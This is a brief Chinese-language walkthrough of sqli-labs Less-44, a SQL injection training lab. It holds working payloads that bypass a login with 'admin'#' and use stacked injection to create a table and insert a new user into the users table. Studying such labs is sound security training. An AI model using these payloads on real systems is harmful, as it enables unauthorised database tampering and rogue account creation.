sqli-labs (less-44)

进入44关，发现依然是这个页面

输入admin'

这里发现没有错误回显了，所以我们只能去猜了

admin# #登入失败
admin'# #登入成功

所以判断闭合方式为’#，并且为字符型注入

这里我们直接使用堆叠注入

创建一张表

a';create table test like users;#

创建一个新的用户

a';insert into users values(18,'icepeak','icepeak');#